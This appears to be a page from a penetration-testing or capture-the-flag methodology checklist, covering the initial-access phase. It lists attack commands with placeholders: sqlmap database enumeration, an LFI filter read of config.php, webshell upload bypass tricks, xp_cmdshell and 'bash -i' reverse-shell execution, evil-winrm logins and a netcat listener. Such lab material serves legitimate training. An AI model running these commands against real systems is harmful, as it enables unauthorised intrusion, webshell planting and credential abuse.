Phase 04: Foothold Execution & Initial Access
Deliver initial exploit payload, bypass security controls, and obtain a reliable remote command execution or reverse shell. This phase has 5 checklist items. Placeholders such as {TARGET_IP} are values for your target.
Exploit Delivery & Reverse Shell Execution
Branch A: Web Injections (SQLi, SSTI, LFI Wrappers, Cmd Injection)
Exploit input validation flaws to retrieve database tables or read source code.
sqlmap -u "http://{TARGET_IP}/view?id=1" --batch --dbs or curl -s "http://{TARGET_IP}/?page=php://filter/convert.base64-encode/resource=config.php"Branch A: File Upload Filter Bypass (Webshell Delivery)
Bypass file upload restrictions to write interactive webshell to webroot.
Upload .phtml, .php5, .phar, double extension or Content-Type spoofingBranch D: Out-of-Band Command Execution via Database
Leverage database administrative privileges to execute system commands.
EXEC xp_cmdshell 'powershell ...' or COPY table FROM PROGRAM 'bash -i ...'Branch C: Credential Validation & Remote Shell Connect
Establish authenticated command session using discovered credentials or SSH keys.
ssh -i id_rsa user@{TARGET_IP} or evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}"Listener Setup & Reverse Shell Catch
Prepare attacker listener and trigger reverse TCP socket callback.
nc -lvnp {LPORT}
All phases
- Host Discovery & Surface Mapping
- Protocol & Service Enumeration
- Vulnerability Identification & Threat Modeling
- Foothold Execution & Initial Access
- Shell Stabilization & Context Triage
- Internal System & Network Reconnaissance
- Privilege Escalation & Lateral Movement
- Post-Exploitation, Flag Vault & Artifact Collection
Tick items off per machine. ZeroBox tracks checklist progress for every target. Open the methodology checklist